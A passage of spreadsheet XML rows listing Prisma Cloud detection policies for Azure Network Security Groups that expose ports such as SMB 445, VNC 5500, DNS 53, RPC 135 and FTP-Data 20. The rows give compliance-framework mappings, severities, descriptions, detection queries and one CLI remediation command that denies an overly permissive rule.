          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2325">
      <c r="A2325"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Microsoft Cloud Security Benchmark v1,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25" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2325" s="2" t="inlineStr"/>
      <c r="D2325" t="inlineStr"/>
      <c r="E2325" t="inlineStr"/>
      <c r="F2325" t="inlineStr"/>
      <c r="G2325" t="b">
        <v>0</v>
      </c>
      <c r="H23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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2325" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2325" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on CIFS (UDP Port 445)</t>
        </is>
      </c>
      <c r="L2325" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2325" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2325" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2325" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2325" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2325" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2325" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2325" t="inlineStr"/>
      <c r="T2325" t="b">
        <v>0</v>
      </c>
      <c r="U2325" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2325" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2325" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on Windows SMB UDP port 445. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict DNS solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2325"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5" t="inlineStr"/>
      <c r="Z2325"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Udp or protocol equals *) and (destinationPortRange contains _Port.inRange(445,445) or destinationPortRanges[*] contains _Port.inRange(445,445) ))] exists</t>
        </is>
      </c>
      <c r="AA2325" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2325" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2325" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-287</t>
        </is>
      </c>
      <c r="AD2325" t="b">
        <v>1</v>
      </c>
      <c r="AE2325" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2325" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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5" t="inlineStr">
        <is>
          <t>bc7929f8-fe70-48ec-8690-4288aa0b98ae</t>
        </is>
      </c>
      <c r="AI2325" t="inlineStr">
        <is>
          <t>0f7fb1e1-dc2b-431f-8dad-efdeae05ebcb</t>
        </is>
      </c>
      <c r="AJ2325" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2325" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2326">
      <c r="A2326"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CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, MITRE ATT&amp;CK v6.3 [Deprecated],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PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM),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Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated],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DORA, TX-RAMP Level 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2326" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2326" s="2" t="inlineStr"/>
      <c r="D2326" t="inlineStr"/>
      <c r="E2326" t="inlineStr"/>
      <c r="F2326" t="inlineStr"/>
      <c r="G2326" t="b">
        <v>0</v>
      </c>
      <c r="H23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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2326" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2326" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on VNC Listener (TCP Port 5500)</t>
        </is>
      </c>
      <c r="L2326" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2326" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2326" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2326" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2326" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2326" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2326" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2326" t="inlineStr"/>
      <c r="T2326" t="b">
        <v>0</v>
      </c>
      <c r="U2326" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2326" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2326" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on VNC Listener TCP port 5500. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict VNC Listener solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2326"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6" t="inlineStr"/>
      <c r="Z2326"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_Port.inRange(5500,5500) or destinationPortRanges[*] contains _Port.inRange(5500,5500) ))] exists</t>
        </is>
      </c>
      <c r="AA2326" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2326" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2326" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-289</t>
        </is>
      </c>
      <c r="AD2326" t="b">
        <v>1</v>
      </c>
      <c r="AE2326" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2326" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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6" t="inlineStr">
        <is>
          <t>91a53c5d-d629-45bb-9610-fbd2cb4c6f3c</t>
        </is>
      </c>
      <c r="AI2326" t="inlineStr">
        <is>
          <t>23c0c9e7-bef8-4c41-a9ec-b5b670667afa</t>
        </is>
      </c>
      <c r="AJ2326" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2326" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2327">
      <c r="A2327"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Microsoft Cloud Security Benchmark v1,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ITSG-33, kashan ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, TX-RAMP Level 2,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27" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2327" s="2" t="inlineStr"/>
      <c r="D2327" t="inlineStr"/>
      <c r="E2327" t="inlineStr"/>
      <c r="F2327" t="inlineStr"/>
      <c r="G2327" t="b">
        <v>0</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2327" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2327" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on NetBIOS DNS (TCP Port 53)</t>
        </is>
      </c>
      <c r="L2327" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2327" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2327" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2327" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2327" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2327" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2327" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2327" t="inlineStr"/>
      <c r="T2327" t="b">
        <v>0</v>
      </c>
      <c r="U2327" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2327" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2327" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on DNS TCP port 53. Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict DNS solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2327"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7" t="inlineStr"/>
      <c r="Z2327"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_Port.inRange(53,53) or destinationPortRanges[*] contains _Port.inRange(53,53) ))] exists</t>
        </is>
      </c>
      <c r="AA2327" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2327" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2327" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-290</t>
        </is>
      </c>
      <c r="AD2327" t="b">
        <v>1</v>
      </c>
      <c r="AE2327" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2327" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>0c620876-4549-46c4-a5b3-16e86e3cefe7</t>
        </is>
      </c>
      <c r="AI2327" t="inlineStr">
        <is>
          <t>7a4a4cb3-8584-4844-ae91-4db22d115cd5</t>
        </is>
      </c>
      <c r="AJ2327" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2327" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2328">
      <c r="A2328" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, testazure, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, CIS v1.1 (Azure), NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, Telecommunications Security Act - TSA, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, ITSG-33, CIS Controls v7.1, NIST CSF, TX-RAMP Level 2, CSA CCM v.4.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.6, CIS Controls v7.1, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, MITRE ATT&amp;CK v10.0 [Deprecated], Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS v1.1 (Azure), ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v4.0, ISO/IEC 27017:2015, SOC 2, kashan ACSC Information Security Manual (ISM), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, Matt's ATT&amp;ACK, CSA CCM v.4.0.1, SOC 2,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Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, NIST CSF, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, testazure, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise,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DORA, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2328" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2328" s="2" t="inlineStr"/>
      <c r="D2328" t="inlineStr"/>
      <c r="E2328" t="inlineStr"/>
      <c r="F2328" t="inlineStr"/>
      <c r="G2328" t="b">
        <v>1</v>
      </c>
      <c r="H23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Matt's alert rule with auto remediation,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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2328" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2328" t="inlineStr">
        <is>
          <t>Azure Network Security Group having Inbound rule overly permissive to all traffic on any protocol</t>
        </is>
      </c>
      <c r="L2328" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2328" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2328" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2328" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2328" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2328" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2328" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2328" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2328" t="b">
        <v>1</v>
      </c>
      <c r="U2328" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2328" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2328" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSGs) which are overly permissive to all traffic on any protocol. A network security group contains a list of security rules that allow or deny inbound or outbound network traffic based on source or destination IP address, port, and protocol. As a best practice, it is recommended to configure NSGs to restrict traffic from known sources, allowing only authorized protocols and ports.</t>
        </is>
      </c>
      <c r="X2328"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and Port ranges OR set the 'Action' to 'Deny' OR 'Delete' the rule based on your requirement.
7. 'Save' your changes.</t>
        </is>
      </c>
      <c r="Y2328" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Network/networkSecurityGroups/securityRules/*' permission. Successful execution will update the network security group to revoke the inbound rule records allowing all traffic from Internet on any protocol.",
'impact': 'reject all traffic from Internet on any protocol',
'cliScriptTemplate': 'az network nsg rule update --name $ruleName --resource-group $resourceGroup --nsg-name $resourceName --access Deny'</t>
        </is>
      </c>
      <c r="Z2328" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name= 'azure-network-nsg-list' AND json.rule = securityRules[?any((sourceAddressPrefix equals Internet or sourceAddressPrefix equals * or sourceAddressPrefix equals 0.0.0.0/0 or sourceAddressPrefix equals ::/0) and protocol equals * and access equals Allow and destinationPortRange contains * and direction equals Inbound)] exists</t>
        </is>
      </c>
      <c r="AA2328" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2328" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2328" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-185</t>
        </is>
      </c>
      <c r="AD2328" t="b">
        <v>1</v>
      </c>
      <c r="AE2328" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2328" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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Matt's alert rule with auto remediation - Notifications:splunk, AccountGroups:Matt's Azure Account group;,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8" t="inlineStr">
        <is>
          <t>840b4b1c-a50b-11e8-98d0-529269fb1459</t>
        </is>
      </c>
      <c r="AI2328" t="inlineStr">
        <is>
          <t>840b475c-a50b-11e8-98d0-529269fb1459</t>
        </is>
      </c>
      <c r="AJ2328" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2328" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2329">
      <c r="A2329"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TX-RAMP Level 1,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TX-RAMP Level 2,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29" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2329" s="2" t="inlineStr"/>
      <c r="D2329" t="inlineStr"/>
      <c r="E2329" t="inlineStr"/>
      <c r="F2329" t="inlineStr"/>
      <c r="G2329" t="b">
        <v>0</v>
      </c>
      <c r="H23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29" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2329" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2329" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on Windows RPC (TCP Port 135)</t>
        </is>
      </c>
      <c r="L2329" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2329" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2329" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2329" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2329" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2329" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2329" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2329" t="inlineStr"/>
      <c r="T2329" t="b">
        <v>0</v>
      </c>
      <c r="U2329" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2329" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2329" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on Windows RPC (TCP Port 135). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict Windows RPC solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2329"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29" t="inlineStr"/>
      <c r="Z2329"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_Port.inRange(135,135) or destinationPortRanges[*] contains _Port.inRange(135,135) ))] exists</t>
        </is>
      </c>
      <c r="AA2329" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2329" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2329" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-273</t>
        </is>
      </c>
      <c r="AD2329" t="b">
        <v>1</v>
      </c>
      <c r="AE2329" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2329" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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29" t="inlineStr">
        <is>
          <t>4afdc071-53ca-4516-8a3c-d5c91345c409</t>
        </is>
      </c>
      <c r="AI2329" t="inlineStr">
        <is>
          <t>cb1fb96b-919f-4042-a745-cd070497f475</t>
        </is>
      </c>
      <c r="AJ2329" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2329" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2330">
      <c r="A2330" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, HIPAA,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TX-RAMP Level 1,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TX-RAMP Level 2,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30" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2330" s="2" t="inlineStr"/>
      <c r="D2330" t="inlineStr"/>
      <c r="E2330" t="inlineStr"/>
      <c r="F2330" t="inlineStr"/>
      <c r="G2330" t="b">
        <v>1</v>
      </c>
      <c r="H2330"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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2330" t="inlineStr">
        <is>
          <t>azure-network-nsg</t>
        </is>
      </c>
      <c r="K2330" t="inlineStr">
        <is>
          <t>Azure Network Security Group allows all traffic on FTP-Data (TCP Port 20)</t>
        </is>
      </c>
      <c r="L2330" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2330" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2330" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2330" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2330" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2330" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2330" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2330" t="inlineStr"/>
      <c r="T2330" t="b">
        <v>0</v>
      </c>
      <c r="U2330" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2330" t="inlineStr">
        <is>
          <t>azure-network-nsg-list</t>
        </is>
      </c>
      <c r="W2330" t="inlineStr">
        <is>
          <t>This policy identifies Azure Network Security Groups (NSG) that allow all traffic on FTP-Data (TCP Port 20). Review your list of NSG rules to ensure that your resources are not exposed. As a best practice, restrict FTP-Data solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X2330"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0" t="inlineStr"/>
      <c r="Z2330"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_Port.inRange(20,20) or destinationPortRanges[*] contains _Port.inRange(20,20) ))] exists</t>
        </is>
      </c>
      <c r="AA2330" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2330" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2330" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-283</t>
        </is>
      </c>
      <c r="AD2330" t="b">
        <v>1</v>
      </c>
      <c r="AE2330" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2330" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>f48eda6b-5d66-4d73-a62e-671de3844555</t>
        </is>
      </c>
      <c r="AI2330" t="inlineStr">
        <is>
          <t>ae2e5e26-4f3b-4bd3-9a8f-93fc2794607c</t>
        </is>
      </c>
      <c r="AJ2330" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2330" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2331">
      <c r="A2331" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CSA CCM v.4.0.1, testazure,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ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, NIST 800-53 Rev 5, CSA CCM v.4.0.1, GDPR, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, CIS v1.1 (Azure), NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, ITSG-33, CIS Controls v7.1, NIST CSF, TX-RAMP Level 2, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.6, CIS Controls v7.1, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS v1.1 (Azure), ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ISO/IEC 27017:2015, SOC 2, kashan ACSC Information Security Manual (ISM), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, CSA CCM v.4.0.1, SOC 2, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, NIST CSF, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, NIST CSF, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, testazure, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM),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ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2331" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2331" s="2" t="inlineStr"/>
      <c r="D2331" t="inlineStr"/>
      <c r="E2331" t="inlineStr"/>
      <c r="F2331" t="inlineStr"/>
      <c r="G2331" t="b">
        <v>1</v>
      </c>
      <c r="H23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1" t="inlineStr">
        <is>
